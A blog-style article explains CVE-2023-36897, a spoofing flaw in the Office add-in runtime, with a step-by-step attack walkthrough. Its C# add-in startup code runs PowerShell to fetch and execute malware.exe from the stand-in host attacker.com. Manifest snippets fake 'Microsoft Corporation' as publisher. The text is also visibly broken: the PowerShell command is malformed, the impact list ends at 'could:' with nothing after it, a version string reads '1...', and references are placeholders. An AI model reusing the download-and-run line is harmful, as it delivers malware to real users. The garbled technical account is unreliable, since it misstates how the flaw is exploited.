CVE-2023-36897 - Exploiting the Visual Studio Tools for Office Runtime Spoofing Vulnerability

In the world of cybersecurity, vulnerabilities in widely-used developer tools are a goldmine for attackers. In this article, we explore CVE-2023-36897, a security bug in the Visual Studio Tools for Office (VSTO) Runtime, which can let attackers spoof trusted content and potentially trick users into running harmful code. We’ll break it down in simple terms, show how attackers exploit it, and share how you can protect yourself.

What is VSTO and Why Does it Matter?

Visual Studio Tools for Office (VSTO) is a set of tools in Microsoft Visual Studio that lets developers create add-ins for Microsoft Office applications, like Word and Excel. These add-ins extend Office’s functionality, but because they’re trusted and commonly used, any security issue in VSTO can become a powerful attack vector.

What Is CVE-2023-36897?

CVE-2023-36897 is classified as a Spoofing Vulnerability discovered in the VSTO Runtime. Spoofing, in this context, means making something appear to be legitimate or from a trusted source when it is not.

### In Microsoft’s words (reference):
>A spoofing vulnerability exists in Visual Studio Tools for Office Runtime when it improperly validates input. An attacker could exploit this vulnerability to trick users into executing malicious code by making it appear to originate from a trusted source.

How Attackers Exploit CVE-2023-36897

Attackers can exploit this bug by crafting a malicious Office add-in (.vsto, .dll, or similar) and disguising it to appear as though it was created by a trustworthy developer or source.

Spoof Certificate or Publisher Information:

The attacker manipulates properties or metadata so it looks like the Office add-in comes from a legitimate, trusted publisher.

Distribute the Add-in:

The add-in is sent to victims by email, uploaded to repositories, or delivered through compromised web pages.

User Is Tricked:

Because security checks can be bypassed or appear fulfilled, the user opens or installs the add-in without warning. The add-in runs with the user’s privileges.

Example Exploit Scenario

Let's look at an example with code snippet to illustrate how someone might exploit this vulnerability.

Step 1: Create a Malicious Add-in

Using Visual Studio, the attacker writes a simple VSTO add-in. For example, a malicious Excel add-in in C#:

using System.Windows.Forms;
using Excel = Microsoft.Office.Interop.Excel;

public partial class ThisAddIn
{
    private void ThisAddIn_Startup(object sender, System.EventArgs e)
    {
        // Malicious code here
        System.Diagnostics.Process.Start("powershell.exe", "-c Invoke-WebRequest -Uri 'http://attacker.com/malware.exe'; -OutFile 'malware.exe'; ./malware.exe");
    }
}

Step 2: Spoof Publisher Info

The attacker tweaks manifest files to spoof the publisher’s identity, making the add-in look legitimate:

Example manifest.xml (partial)

<Publisher>Microsoft Corporation</Publisher>
<Product>Excel</Product>

Step 3: Deliver The Payload

The attacker sends the .vsto and associated files packaged as a trustworthy Office add-in.

Step 4: Execution

On opening, the Excel add-in downloads and runs a payload from an attacker-controlled server. Because of spoofed metadata, warnings are suppressed or appear as if the add-in is safe.

Technical Breakdown

The root problem is improper input validation in VSTO's handler for publisher information. VSTO should rigorously check the source and signature of add-ins, but CVE-2023-36897 lets attackers slip fake information through, defeating basic trust systems and security checks.

Proof of Concept (PoC) Snippet

This isn’t a full exploit, but demonstrates setting fake publisher info in an Office add-in package:

manifest.xml

<assemblyIdentity version="1..." name="Fake.AddIn"/>
<description>Description: Useful Excel Add-In</description>
<Publisher>Microsoft Corporation</Publisher>
<productName>Excel Security Analyzer</productName>

*If VSTO doesn't properly validate publisher info and lets the add-in run without warning, the system is vulnerable.*

Real-World Impact

This vulnerability is particularly dangerous in organizations that rely on Office add-ins from internal or external partners. A well-crafted spoofed add-in could:

Fix and Mitigations

Microsoft has patched the issue in recent Office/VSTO updates. (See official patch info)

References & Further Reading

- Microsoft Security Response Center — CVE-2023-36897
- Microsoft VSTO Documentation
- CERT Advisory on Office Add-in Attacks
- Proof-of-Concept Add-in Structure

Conclusion

CVE-2023-36897 is a crucial reminder that even trusted environments like Microsoft Office can be abused. Make sure your systems are updated, and always be skeptical of unexpected add-ins, no matter how “safe” they look.

*Stay informed, stay protected!*

Note: This post is for informational purposes only and should not be used for unauthorized testing or exploitation. Always act responsibly in security research.

Timeline

Published on: 08/08/2023 18:15:00 UTC
Last modified on: 08/10/2023 20:52:00 UTC